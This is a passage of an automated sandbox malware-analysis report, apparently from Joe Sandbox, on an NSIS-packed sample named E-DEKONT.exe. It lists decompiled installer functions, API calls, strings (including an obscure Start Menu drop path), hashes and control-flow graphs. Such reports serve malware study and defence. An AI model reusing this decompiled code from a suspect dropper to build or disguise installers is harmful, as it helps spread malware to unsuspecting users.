						 *0x42d228 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434ee0, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432e80;
					E00406150(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432e80, 0);
					_t63 =  *0x432e80; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432e82;
						 *((short*)(E00405B80(0x432e82, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406282(_t86, E00405B53(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B9F(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                                                            0x00403996
                                                                            0x0040399f
                                                                            0x004039a6
                                                                            0x004039a8
                                                                            0x004039bc
                                                                            0x004039ce
                                                                            0x004039d7
                                                                            0x004039e0
                                                                            0x004039e7
                                                                            0x004039ec
                                                                            0x004039f3
                                                                            0x00403a06
                                                                            0x00403a06
                                                                            0x00403a11
                                                                            0x004039aa
                                                                            0x004039aa
                                                                            0x004039b5
                                                                            0x004039b5
                                                                            0x00403a16
                                                                            0x00403a20
                                                                            0x00403a29
                                                                            0x00403a2e
                                                                            0x00403a3f
                                                                            0x00403ad1
                                                                            0x00403ad9
                                                                            0x00403ae2
                                                                            0x00403ae2
                                                                            0x00403af8
                                                                            0x00403afe
                                                                            0x00403b0c
                                                                            0x00403b8d
                                                                            0x00403b95
                                                                            0x00403b9f
                                                                            0x00403ba4
                                                                            0x00403baa
                                                                            0x00403c34
                                                                            0x00403c39
                                                                            0x00403c3b
                                                                            0x00403c57
                                                                            0x00000000
                                                                            0x00403c57
                                                                            0x00403c3d
                                                                            0x00403c43
                                                                            0x00403c4b
                                                                            0x00403c4b
                                                                            0x00000000
                                                                            0x00403c43
                                                                            0x00403bb8
                                                                            0x00403bc3
                                                                            0x00403bc8
                                                                            0x00403bca
                                                                            0x00403bd1
                                                                            0x00403bd1
                                                                            0x00403bdc
                                                                            0x00403be4
                                                                            0x00403be6
                                                                            0x00403be8
                                                                            0x00403bf1
                                                                            0x00403bf4
                                                                            0x00403bfa
                                                                            0x00403bfa
                                                                            0x00403c19
                                                                            0x00403c2a
                                                                            0x00000000
                                                                            0x00403c2f
                                                                            0x00403b97
                                                                            0x00403b99
                                                                            0x00000000
                                                                            0x00403b0e
                                                                            0x00403b0e
                                                                            0x00403b1a
                                                                            0x00403b24
                                                                            0x00403b2a
                                                                            0x00403b2f
                                                                            0x00403b3e
                                                                            0x00403c5c
                                                                            0x00403c5c
                                                                            0x00000000
                                                                            0x00403c5c
                                                                            0x00403b4d
                                                                            0x00403b88
                                                                            0x00000000
                                                                            0x00403b88
                                                                            0x00403a45
                                                                            0x00403a45
                                                                            0x00403a48
                                                                            0x00403a4a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403a58
                                                                            0x00403a6a
                                                                            0x00403a6f
                                                                            0x00403a78
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403a7e
                                                                            0x00403a80
                                                                            0x00403a8d
                                                                            0x00403a8d
                                                                            0x00403a96
                                                                            0x00403a9c
                                                                            0x00403ac4
                                                                            0x00403acc
                                                                            0x00000000
                                                                            0x00403aae
                                                                            0x00403aaf
                                                                            0x00403ab8
                                                                            0x00403abe
                                                                            0x00403abf
                                                                            0x00000000
                                                                            0x00403abf
                                                                            0x00403aba
                                                                            0x00403abc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403abc
                                                                            0x00403a9c

                                                                            APIs
                                                                              • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                              • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75F63420,"C:\Users\user\Desktop\E-DEKONT.exe",00000000), ref: 004039AA
                                                                              • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                                            • lstrcatW.KERNEL32(1033,0042D248), ref: 00403A11
                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra), ref: 00403AF8
                                                                            • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                                            • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                                            • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Ydervgg\Superassume\dodecaheddra$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                            • API String ID: 606308-1182076736
                                                                            • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                                            • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                                            • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                                            • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 439 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d74 442 402f11-402f16 439->442 443 402f1b-402f49 call 406282 call 405b9f call 406282 GetFileSize 439->443 444 4030f3-4030f7 442->444 451 403036-403044 call 402e5d 443->451 452 402f4f 443->452 458 403046-403049 451->458 459 403099-40309e 451->459 454 402f54-402f6b 452->454 456 402f6d 454->456 457 402f6f-402f78 call 403315 454->457 456->457 465 4030a0-4030a8 call 402e5d 457->465 466 402f7e-402f85 457->466 461 40304b-403063 call 40332b call 403315 458->461 462 40306d-403097 GlobalAlloc call 40332b call 4030fa 458->462 459->444 461->459 489 403065-40306b 461->489 462->459 487 4030aa-4030bb 462->487 465->459 471 403001-403005 466->471 472 402f87-402f9b call 405d2f 466->472 476 403007-40300e call 402e5d 471->476 477 40300f-403015 471->477 472->477 486 402f9d-402fa4 472->486 476->477 483 403024-40302e 477->483 484 403017-403021 call 40674f 477->484 483->454 488 403034 483->488 484->483 486->477 492 402fa6-402fad 486->492 493 4030c3-4030c8 487->493 494 4030bd 487->494 488->451 489->459 489->462 492->477 495 402faf-402fb6 492->495 496 4030c9-4030cf 493->496 494->493 495->477 497 402fb8-402fbf 495->497 496->496 498 4030d1-4030ec SetFilePointer call 405d2f 496->498 497->477 499 402fc1-402fe1 497->499 502 4030f1 498->502 499->459 501 402fe7-402feb 499->501 503 402ff3-402ffb 501->503 504 402fed-402ff1 501->504 502->444 503->477 505 402ffd-402fff 503->505 504->488 504->503 505->477
                                                                            C-Code - Quality: 80%
                                                                            			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe";
				 *0x434ef0 = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\E-DEKONT.exe", 0x400);
				_t89 = E00405D74(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E00406282(L"C:\\Users\\Arthur\\Desktop", _t91);
				E00406282(0x443000, E00405B9F(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x422a04 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D(1);
					__eflags =  *0x434ef8 - _t82;
					if( *0x434ef8 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E0040332B( *0x434ef8 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434ef4 = _t94;
							 *0x434efc =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f00 =  *0x434f00 + 1;
								__eflags =  *0x434f00;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405D2F(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E0040332B( *0x4169f8);
					_t65 = E00403315( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434ef8) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403315(0x422a08, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434ef8;
						if( *0x434ef8 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405D2F( &_v44, 0x422a08, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x4169f8; // 0x4f892
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434ef8 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x422a04; // 0x4f896
						if(__eflags < 0) {
							_v12 = E0040674F(_v12, 0x422a08, _t90);
						}
						 *0x4169f8 =  *0x4169f8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}































                                                                            0x00402ec9
                                                                            0x00402ecc
                                                                            0x00402ecf
                                                                            0x00402ed2
                                                                            0x00402ed8
                                                                            0x00402ee9
                                                                            0x00402eee
                                                                            0x00402f01
                                                                            0x00402f06
                                                                            0x00402f09
                                                                            0x00402f0f
                                                                            0x00000000
                                                                            0x00402f11
                                                                            0x00402f1c
                                                                            0x00402f22
                                                                            0x00402f33
                                                                            0x00402f3a
                                                                            0x00402f40
                                                                            0x00402f42
                                                                            0x00402f47
                                                                            0x00402f49
                                                                            0x00403036
                                                                            0x00403038
                                                                            0x0040303d
                                                                            0x00403044
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403046
                                                                            0x00403049
                                                                            0x0040306d
                                                                            0x00403072
                                                                            0x00403078
                                                                            0x00403083
                                                                            0x00403088
                                                                            0x0040308b
                                                                            0x0040308c
                                                                            0x0040308d
                                                                            0x0040308f
                                                                            0x00403094
                                                                            0x00403097
                                                                            0x004030aa
                                                                            0x004030ae
                                                                            0x004030b6
                                                                            0x004030bb
                                                                            0x004030bd
                                                                            0x004030bd
                                                                            0x004030bd
                                                                            0x004030c5
                                                                            0x004030c5
                                                                            0x004030c8
                                                                            0x004030c9
                                                                            0x004030c9
                                                                            0x004030cc
                                                                            0x004030ce
                                                                            0x004030ce
                                                                            0x004030ce
                                                                            0x004030d8
                                                                            0x004030de
                                                                            0x004030ec
                                                                            0x004030f1
                                                                            0x00000000
                                                                            0x004030f1
                                                                            0x00000000
                                                                            0x00403097
                                                                            0x00403051
                                                                            0x0040305c
                                                                            0x00403061
                                                                            0x00403063
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403068
                                                                            0x0040306b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402f4f
                                                                            0x00402f54
                                                                            0x00402f59
                                                                            0x00402f5d
                                                                            0x00402f64
                                                                            0x00402f69
                                                                            0x00402f6b
                                                                            0x00402f6d
                                                                            0x00402f6d
                                                                            0x00402f71
                                                                            0x00402f76
                                                                            0x00402f78
                                                                            0x004030a2
                                                                            0x00403099
                                                                            0x00000000
                                                                            0x00403099
                                                                            0x00402f7e
                                                                            0x00402f85
                                                                            0x00403001
                                                                            0x00403005
                                                                            0x00403009
                                                                            0x0040300e
                                                                            0x00000000
                                                                            0x00403005
                                                                            0x00402f8e
                                                                            0x00402f93
                                                                            0x00402f96
                                                                            0x00402f9b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402f9d
                                                                            0x00402fa4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402fa6
                                                                            0x00402fad
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402faf
                                                                            0x00402fb6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402fb8
                                                                            0x00402fbf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402fc1
                                                                            0x00402fc7
                                                                            0x00402fd0
                                                                            0x00402fd6
                                                                            0x00402fd9
                                                                            0x00402fdb
                                                                            0x00402fe1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402fe7
                                                                            0x00402feb
                                                                            0x00402ff3
                                                                            0x00402ff3
                                                                            0x00402ff6
                                                                            0x00402ff6
                                                                            0x00402ff9
                                                                            0x00402ffb
                                                                            0x00402ffd
                                                                            0x00402ffd
                                                                            0x00000000
                                                                            0x00402ffb
                                                                            0x00402fed
                                                                            0x00402ff1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040300f
                                                                            0x0040300f
                                                                            0x00403015
                                                                            0x00403021
                                                                            0x00403021
                                                                            0x00403024
                                                                            0x0040302a
                                                                            0x0040302c
                                                                            0x0040302c
                                                                            0x00403034
                                                                            0x00403034
                                                                            0x00000000
                                                                            0x00403034

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00402ED2
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\E-DEKONT.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                                              • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                                              • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\E-DEKONT.exe,C:\Users\user\Desktop\E-DEKONT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: "C:\Users\user\Desktop\E-DEKONT.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\E-DEKONT.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 4283519449-2187476416
                                                                            • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                            • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                                            • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                                            • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004062A4 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 770 4062a4-4062af 771 4062b1-4062c0 770->771 772 4062c2-4062d8 770->772 771->772 773 4064f0-4064f6 772->773 774 4062de-4062eb 772->774 775 4064fc-406507 773->775 776 4062fd-40630a 773->776 774->773 777 4062f1-4062f8 774->777 779 406512-406513 775->779 780 406509-40650d call 406282 775->780 776->775 778 406310-40631c 776->778 777->773 781 406322-406360 778->781 782 4064dd 778->782 780->779 784 406480-406484 781->784 785 406366-406371 781->785 786 4064eb-4064ee 782->786 787 4064df-4064e9 782->787 790 406486-40648c 784->790 791 4064b7-4064bb 784->791 788 406373-406378 785->788 789 40638a 785->789 786->773 787->773 788->789 794 40637a-40637d 788->794 797 406391-406398 789->797 795 40649c-4064a8 call 406282 790->795 796 40648e-40649a call 4061c9 790->796 792 4064ca-4064db lstrlenW 791->792 793 4064bd-4064c5 call 4062a4 791->793 792->773 793->792 794->789 799 40637f-406382 794->799 808 4064ad-4064b3 795->808 796->808 801 40639a-40639c 797->801 802 40639d-40639f 797->802 799->789 804 406384-406388 799->804 801->802 806 4063a1-4063bf call 406150 802->806 807 4063da-4063dd 802->807 804->797 816 4063c4-4063c8 806->816 809 4063ed-4063f0 807->809 810 4063df-4063eb GetSystemDirectoryW 807->810 808->792 812 4064b5 808->812 814 4063f2-406400 GetWindowsDirectoryW 809->814 815 40645b-40645d 809->815 813 40645f-406463 810->813 817 406478-40647e call 406516 812->817 813->817 818 406465 813->818 814->815 815->813 820 406402-40640c 815->820 821 406468-40646b 816->821 822 4063ce-4063d5 call 4062a4 816->822 817->792 818->821 826 406426-40643c SHGetSpecialFolderLocation 820->826 827 40640e-406411 820->827 821->817 824 40646d-406473 lstrcatW 821->824 822->813 824->817 830 406457 826->830 831 40643e-406455 SHGetPathFromIDListW CoTaskMemFree 826->831 827->826 829 406413-40641a 827->829 832 406422-406424 829->832 830->815 831->813 831->830 832->813 832->826
                                                                            C-Code - Quality: 72%
                                                                            			E004062A4(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x433ebc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x434f38 + _t43 * 2;
				_t44 = 0x432e80;
				_t110 = 0x432e80;
				if(_a4 >= 0x432e80 && _a4 - 0x432e80 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E004062A4(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x432e80;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x435000;
							E00406282(_t110, (_t106 << 0xb) + 0x435000);
						} else {
							E004061C9(_t110,  *0x434ee8);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E00406516(_t110);
						}
						goto L43;
					}
					_t86 =  *0x434eec;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x434f84;
						if( *0x434f84 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x434ee4;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E00406150( *0x434f38, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
